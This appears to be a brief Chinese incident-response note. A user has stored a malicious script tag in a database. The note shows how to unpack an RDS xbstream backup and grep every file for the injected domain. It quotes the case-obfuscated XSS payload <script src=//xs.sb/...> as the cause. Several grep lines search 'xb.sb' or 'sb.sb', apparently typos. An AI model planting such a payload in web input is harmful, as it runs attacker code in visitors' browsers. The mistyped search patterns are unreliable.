原因
用户提交恶意脚本,例如<sCrIpt srC=//xs.sb/xF2l></sCRipT>
。需要排查数据库中所有字段是否含字符串:xs.sb
做法
# 1. 下载rds上备份到本地linux机器,例如xxx_qp.xb文件,本人50G左右
# 2. 解压到当前目录
cat xxx_qp.xb | xbstream -x -v -C ./
# 分析每个文件含有恶意字符串的行,去掉参数-a可以只检查是否存在
grep -arn "xb.sb" backup-my.cnf.qp ibdata1.qp rds_table_info_json_40212.log
grep -arn "xb.sb" xt*
grep -arn "sb.sb" mysql
grep -arn 'xs.sb' performance_schema/
grep -arn 'xs.sb' report/
grep -arn 'xs.sb' sonar/
grep -arn 'xs.sb' sys/
grep -arn 'xs.sb' ycb_old/
grep -arn 'xs.sb' ycb_fund/
grep -arn 'xs.sb' youbei_web/ > xs_sb_youbei_web.txt
grep -arn 'xs.sb' ycb/ > xs_sb_ycb.txt